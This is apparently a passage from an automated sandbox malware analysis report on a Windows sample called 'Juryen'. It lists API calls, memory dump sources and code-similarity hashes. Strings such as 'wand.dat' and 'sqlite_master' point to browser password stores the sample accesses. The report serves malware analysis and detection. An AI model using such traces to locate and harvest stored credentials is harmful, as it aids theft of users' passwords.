• SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
• SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
• Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
• Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
• Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
• Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: ClassName_wcsicmpmemset
• String ID: edit
• API String ID: 2747424523-2167791130
• Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
• Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
• Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
• Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
• FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 3150196962-1506664499
• Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
• Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
• Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
• Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
APIs
• memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
• memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
• memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
• memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
• memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: memcpy$memcmp
• String ID:
• API String ID: 3384217055-0
• Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
• Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
• Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
• Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
APIs
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
• Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
• Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
• Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
• Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
APIs
  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
• GetMenu.USER32(?), ref: 00410F8D
• GetSubMenu.USER32(00000000), ref: 00410F9A
• GetSubMenu.USER32(00000000), ref: 00410F9D
• CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: Menu$ItemMessageSend$CheckEnableRadio
• String ID:
• API String ID: 1889144086-0
• Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
• Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
• Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
• Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
• GetLastError.KERNEL32 ref: 0041810A
• CloseHandle.KERNEL32(00000000), ref: 00418120
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID:
• API String ID: 1661045500-0
• Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
• Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
• Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
• Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
APIs
  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
• memcpy.MSVCRT(?,?,?), ref: 0042EC7A
Strings
• virtual tables may not be altered, xrefs: 0042EBD2
• Cannot add a column to a view, xrefs: 0042EBE8
• sqlite_altertab_%s, xrefs: 0042EC4C
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: memcpymemset
• String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
• API String ID: 1297977491-2063813899
• Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
• Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
• Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
• Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.*$dat$wand.dat
• API String ID: 2618321458-1828844352
• Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
• Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
• Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
• Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
• wcslen.MSVCRT ref: 00410C74
• _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
• _wcsicmp.MSVCRT ref: 00410CCE
• _wcsicmp.MSVCRT ref: 00410CDF
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: _wcsicmp$??2@??3@_wtoiwcslen
• String ID:
• API String ID: 1549203181-0
• Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
• Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
• Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
• Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00412057
                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                    • String ID:
                                                                    • API String ID: 3550944819-0
                                                                    APIs
                                                                    • free.MSVCRT ref: 0040F561
                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$free
                                                                    • String ID: g4@
                                                                    • API String ID: 2888793982-2133833424
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: @
                                                                    • API String ID: 3510742995-2766056989
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                    • memset.MSVCRT ref: 0040AF18
                                                                    • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@memcpymemset
                                                                    • String ID:
                                                                    • API String ID: 1865533344-0
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004144E7
                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                    • memset.MSVCRT ref: 0041451A
                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1127616056-0
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                    • memset.MSVCRT ref: 0042FED3
                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: sqlite_master
                                                                    • API String ID: 438689982-3163232059
                                                                    APIs
                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3917621476-0
                                                                    APIs
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                    • String ID:
                                                                    • API String ID: 822687973-0
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                                                                    • malloc.MSVCRT ref: 00417459
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,771ADF80,?,0041755F,?), ref: 00417478
                                                                    • free.MSVCRT ref: 0041747F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                    • String ID:
                                                                    • API String ID: 2605342592-0
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                    • RegisterClassW.USER32(00000001), ref: 00412428
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 2678498856-0
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Item
                                                                    • String ID:
                                                                    • API String ID: 3888421826-0
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00417B7B
                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                    • String ID:
                                                                    • API String ID: 3727323765-0
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F673
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                    • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
